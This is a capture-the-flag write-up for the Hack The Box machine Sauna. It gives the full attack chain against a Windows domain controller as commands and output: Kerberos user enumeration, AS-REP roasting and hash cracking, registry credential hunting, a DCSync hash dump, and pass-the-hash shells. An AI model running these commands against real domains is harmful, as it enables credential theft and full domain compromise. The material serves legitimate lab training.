Sauna - HTB Writeup
Machine Overview
Sauna was an easy-rated Windows machine that involved exploiting the As-Rep Roasting attack to find the hash of the fsmith user, which was cracked using hashcat. For lateral movement, we obtained the clear text password of the svc_loanmgr user from Winlogon. svc_loanmgr has DCSync rights on the domain, which we used to dump the user’s hashes and perform a pass-the-hash attack to gain access to the administrator account.
User
Scanning through Nmap
First, we’ll use nmap to scan the entire network and identify the services running. I’ll use the -p- flag to scan all 65535 ports with a –min-rate 10000 to speed up the process. After scanning, we’ll filter the results to show only the open ports using various terminal tools like cut and tr. Here’s the complete command:
1
$ nmap -p- --min-rate 10000 10.10.10.175 -oN ini.txt && cat ini.txt | cut -d ' ' -f1 | tr -d '/tcp' | tr '\n' ','
Now, let’s run a thorough scan on these specific ports using…
1
$ nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49668,49673,49674,49675,49721,49744 -sC -sV -A -T4 10.10.10.175 -oN scan.txt
- -sC is to run all the default scripts,
- -sV for service and version detection
- -A for Enable OS detection, version detection, script scanning, and traceroute
- -T4 for aggressive scan
- -oN to write the result into a specified file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-09 00:57:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49721/tcp open msrpc Microsoft Windows RPC
49744/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3h20m23s
| smb2-time:
| date: 2024-01-09T00:58:10
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Information Gathering
Through Nmap, we discovered that port 53 (DNS) is open, which can be used to perform zone transfers. Port 80 (HTTP) is also open, along with port 88 (Kerberos), which can be useful for enumeration purposes. Additionally, ports 139 and 445 (SMB) are open, allowing enumeration of shares with anonymous user access for initial entry. Port 389 (LDAP) is open, as well as port 5985 (WinRM), which can facilitate machine login with valid credentials. Nmap identified the domain name as EGOTISTICAL-BANK.LOCAL using LDAP scripts. Let’s add this information to our local DNS file called /etc/hosts for domain resolution on our computer.
Port 53 DNS
Let’s start by exploring port 53 (DNS) and attempt to perform a zone transfer using dig (Domain Information Grabber, used for retrieving information about DNS name servers. It is used for verifying and troubleshooting DNS problems and to perform DNS lookups). The command to perform the zone transfer is dig axfr @10.10.10.175 EGOTISTICAL-BANK.LOCAL. Here, axfr is a protocol used for zone transfers, allowing replication of DNS data across multiple DNS servers. However, we were unable to retrieve any useful information.
Port 80 http
Now, let’s move on to the next port, which is port 80 (HTTP). A simple bank website is running on this port, and it appears to be static, with no interaction with user input.
After scrolling down, I found the names of team members at the bank. These names could be very beneficial for us to perform an AS-Rep Roasting attack to check if any of the users have the privilege “Do Not Require Pre-Authentication”. However, I’m not sure about the naming convention used inside the bank. Typically, it follows the format <First Initial><Last Name>. So, our username in the domain would be: 1. fsmith 2. scoins 3. sdriver 4. btylor 5. hbear 6. skerb
Port 88 Kerberose
We will take a look at these users in the exploitation phase. Let’s move towards our next enumeration step, which is port 88 Kerberos. We can use it to enumerate users because we don’t have any valid credentials yet. To enumerate users in the domain, we will use a tool called kerbrute. It’s a tool used to quickly brute-force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication. It can also be used to perform password spraying on the domain if we manage to find a valid password. Kerbrute provides us with many functions, including:
1
2
3
4
5
6
7
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
We will be using that userenum function. The command we will use will be
1
$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/SecLists-master/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
- -d is for domain name
- –dc for domain controller.
Kerbrute found some valid accounts like fsmit, which we discovered before, and also identified that the user fsmith has the permission of “Do Not Require Pre Authentication”. We can exploit this vulnerability.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/SecLists-master/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 01/08/24 - Ronnie Flathers @ropnop
2024/01/08 17:34:48 > Using KDC(s):
2024/01/08 17:34:48 > 10.10.10.175:88
2024/01/08 17:35:53 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2024/01/08 17:41:46 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL
2024/01/08 17:42:39 > [+] VALID USERNAME: Administrator@EGOTISTICAL-BANK.LOCAL
2024/01/08 17:46:00 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:bd03f23e7dfb4e339ebbc9893f994ee8$7d6a41e904e890e8177eb99c3642b77d53879a2352cb686ea4a4867c209f5be8fc49c80ea4a52bac02d3ea6a8bd036ed510ae953411cf66277cf88186af86efaba9473af82db6bbc0b0a5f02d49936d25be1adc4c0533e232d706f7e4762cd42328ffc0714e8dc76bf74832b660fc9a61c74320f4237178996fdc370ae054aac7f48fe94fa5c40c5d7f30d5ea41551b6309ce1d436d3916132bba8d577b354a4326255d4612cc15bb2006e49e360b6cac3a153fb8f627e46b8c20a8147c386a39e4d10c60315862850ba932a77984a2e5ae70aea729b67fe77f5bc6830a378201de19fb7d26639876ffba0e833f387f7586a0d0f4ec82dbbb6e700f13ee2c466c60e160c7f94fd12efa8416fc769e4f7493a2a4797d6
2024/01/08 17:46:00 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
We can crack this password and log in to the machine using evil-winrm, as we discovered before that port 5985 winrm is enabled.
Port 389 Ldap
Using ldapsearch, we can enumerate users in the domain and discover the naming context, etc. Let’s first discover the naming context of the domain. The command will be:
1
$ ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts
- -x for simple authentication
- -H for host
- -s to set scope to base
- namingcontext for getting naming context of domain
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
Port 139 & 445 SMB
We also have SMB ports open. Let’s try to list out SMB shares if they are available publicly using smbclient. The command will be smbclient -L \\10.10.10.175. Here, -L is used to list shares. However, there are no shares available for us.
1
2
3
4
5
6
7
8
9
$ smbclient -L \\10.10.10.175
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Exploitation
Now, moving on to the exploitation phase, we have a list of users, and Kerbrute has identified that the user fsmit has the permission “Do Not Require Pre Authentication.” This permission can be exploited using an AS-REP Roasting attack. AS-REP Roasting allows attacker to steal the password hashes of user accounts with Kerberos preauthentication disabled, meaning they don’t need to provide their password to log into the domain. Attackers can then attempt to crack these hashes offline.
For exploitation, we’ll use a tool called GetNPUsers.py from the Impacket toolkit. GetNPUsers.py allows us to retrieve domain users hash who have Do not require Kerberos preauthentication set and request their TGTs without knowing their passwords.
Let’s try to crack it using hashcat.
1
$ hashcat hashes rockyou.txt
we successfully able to crack the password Thestrokes23
Shell as fsmith
As we discovered through Nmap that the WinRM port 3985 is open, we can use a tool called Evil-WinRM to log in to the fsmith account.
1
$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
- -i for domain IP
- -u for user name
- -p for user password.
Privilege Escalation
Enumeration using Winpeas
As when we get shell into a Windows domain machine, the very first thing that comes to mind is to check the valid user accounts running in the Domain environment. We found only four valid user accounts: Administrator, fsmith, hsmith, and svc_loanmgr.
1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
After discovering users, let’s run WinPEAS.exe. WinPEAS is a compilation of local Windows privilege escalation scripts that check for cached credentials, user accounts, access controls, interesting files, registry permissions, service accounts, patch levels, and more. To do this, we first need to run an SMB server on our attacking machine to host shares that we can access on the victim machine. For this purpose, we will be using a script called smbserver.py from the Impacket toolkit.
1
2
3
4
5
6
7
8
9
$ sudo smbserver.py myshares ~/tools/AD -username ab -password ab -smb2support
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Now mount the shares on victim machine so that we can access it there.
1
2
3
4
5
$ net use \\10.10.16.28\myshares /u:ab ab
The command completed successfully.
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd \\10.10.16.28\myshares
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\10.10.16.28\myshares>
Now, run WinPEAS on the victim machine and save the output file “suana_peas” into our shares so that we can read it on our attacker machine. However, I didn’t find any useful information there. So, next, I decided to hunt for credentials on the domain. Here is a great source for password hunting written by Juggernaut Pentesting Academy. In the registry keys part, I found a registry name winlogon, which is used to store credentials tied to a setting in Windows called Autologon. Autologon enables you to easily configure Windows’ built-in autologon mechanism. If the autologon feature of Windows is enabled, then the password will be stored in clear text.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\10.10.16.28\myshares> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x156458a35
ShutdownFlags REG_DWORD 0x13
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!
Through this, I found that a user named svc_loanmanager has the autologon feature enabled, and its clear text password is Moneymakestheworldgoround!. This loanmanager account is very similar to the account present in the domain called svc_loanmgr which we discovered before. Now we can move horizontally to our next user called svc_loanmgr. Let’s log into it using evil-winrm with these credentials.
1
2
3
4
5
6
7
8
9
10
11
12
$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
Now that we’re in the loan_manager account, let’s run SharpHound, an investigator used to gather information from all over the domain. SharpHound is preferable for loot. Run the command ./SharpHound.exe --CollectionMethods All. After it completes, download it to your local machine, and run BloodHound. Upload the data to BloodHound and start investigating the graphs. We will run SharpHound the same way we ran WinPEAS before.
To run BloodHound, we first need to start Neo4j, a graph database system. Then, upload the data collected by SharpHound to BloodHound.
To start BloodHound, open a new terminal and type bloodhound, then press Enter. If it’s your first time running BloodHound, you’ll need to reset the default credentials, which are neo4j:neo4j. After logging in, upload the zip file created by SharpHound. You can either drag and drop the file into BloodHound or use the “Upload Data” button. Wait for the data to upload into the database.
After successfully uploading the data, it’s time to start the investigation. Use the search bar to find both users fsmith and svc_loanmgr, then right-click on each user and select Mark User as Owned.
Now, navigate to the Analysis tab and under the Shortest Path tab, select Shortest Path to Domain Admins from owned Principals. Here, we can see a graph indicating that our user svc_loanmgr has DcSync rights on the Domain. A DCSync attack involves using commands in Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to mimic a domain controller (DC) and retrieve user credentials from another DC.
Exploitation
DCSync occurs due to MS-DRSR (Microsoft Directory Replication Service Remote Protocol), which is responsible for replicating data between different domain controllers so that they have real-time data of all users in the Active Directory (AD). In a DCSync attack, the attacker impersonates a domain controller and requests user credentials stored in the domain. To exploit this vulnerability, we will use a tool called secretsdump.py from the Impacket toolkit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ secretsdump.py 'EGOTISTICAL-BANK/svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
Impacket v0.11.0 - Copyright 2023 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
.
.
.
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:dc0111a7b0d303055899524e983198cb:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
.
.
.
SAUNA$:aes128-cts-hmac-sha1-96:bc403a1efe37ae09e938eccb8e0f5b7f
SAUNA$:des-cbc-md5:91f2a8d051abbc86
Pass-The-Hash attack
Now that we have obtained the NTLM hash for the Administrator user, we can perform a pass-the-hash attack using various tools such as wmiexec, psexec, and evil-winrm.
Using wmiexec
1
2
3
4
5
6
7
8
9
10
$ wmiexec.py 'EGOTISTICAL-BANK/Administrator@10.10.10.175' -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>shell
C:\>shell
C:\>whoami
egotisticalbank\administrator
Using psexec
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ psexec.py 'EGOTISTICAL-BANK/Administrator@10.10.10.175' -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file rzxyopMa.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service elyw on 10.10.10.175.....
[*] Starting service elyw.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Using Evil-winrm
In evil-winrm, we only use the NT part of the hash for authentication.
1
2
3
4
5
6
7
8
9
10
$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Flags
User : 338784697d48cf4……..4731361025
Root : f64948489f……..b50ee303995272